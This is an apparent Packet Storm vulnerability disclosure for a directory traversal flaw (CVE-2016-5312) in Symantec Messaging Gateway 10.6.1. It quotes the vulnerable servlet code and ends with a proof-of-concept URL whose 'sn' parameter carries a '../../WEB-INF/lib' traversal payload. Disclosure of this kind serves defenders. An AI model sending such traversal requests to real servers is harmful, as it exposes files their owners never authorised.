Symantec Messaging Gateway 10.6.1 Directory Traversal

2016-09-28T00:00:00
ID PACKETSTORM:138891
Type packetstorm
Reporter R-73eN
Modified 2016-09-28T00:00:00

Description

                                        
                                            `# Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal  
# Date : 28/09/2016  
# Author : R-73eN  
# Tested on : Symantec Messaging Gateway 10.6.1 (Latest)  
# Software : https://www.symantec.com/products/threat-protection/messaging-gateway  
# Vendor : Symantec  
# CVE : CVE-2016-5312  
# Vendor Advisory and Fix: https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160927_00  
#   
# ___ __ ____ _ _   
# |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | |   
# | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | |   
# | || | | | _| (_) | |_| | __/ | | | / ___ \| |___   
# |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|  
#  
#  
# DESCRIPTION:  
#  
# A charting component in the Symantec Messaging Gateway control center does not properly sanitize user input submitted for charting requests.   
# This could potentially result in an authorized but less privileged user gaining access to paths outside the authorized directory.   
# This could potentially provide read access to some files/directories on the server for which the user is not authorized.  
#  
The problem relies in the package kavachart-kcServlet-5.3.2.jar , File : com/ve/kavachart/servlet/ChartStream.java  
The vulnerable code is  
extends HttpServlet {  
public void doGet(HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse) {  
block6 : {  
try {  
String string = httpServletRequest.getParameter("sn");   
//**** Taking parameter "sn" and writing it to the "string variable"  
  
  
if (string == null) break block6;  
String string2 = string.substring(string.length() - 3);  
  
byte[] arrby = (byte[])this.getServletContext().getAttribute(string);   
  
//**** The string variable is passed here without any sanitanization for directory traversal  
//**** and you can successfully use this to do a directory traversal.  
  
if (arrby != null) {  
httpServletResponse.setContentType("image/" + string2);  
ServletOutputStream servletOutputStream = httpServletResponse.getOutputStream();  
httpServletResponse.setContentLength(arrby.length);  
servletOutputStream.write(arrby);  
this.getServletContext().removeAttribute(string);  
break block6;  
}  
  
  
POC:   
https://IP-address:PORT/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/lib  
  
`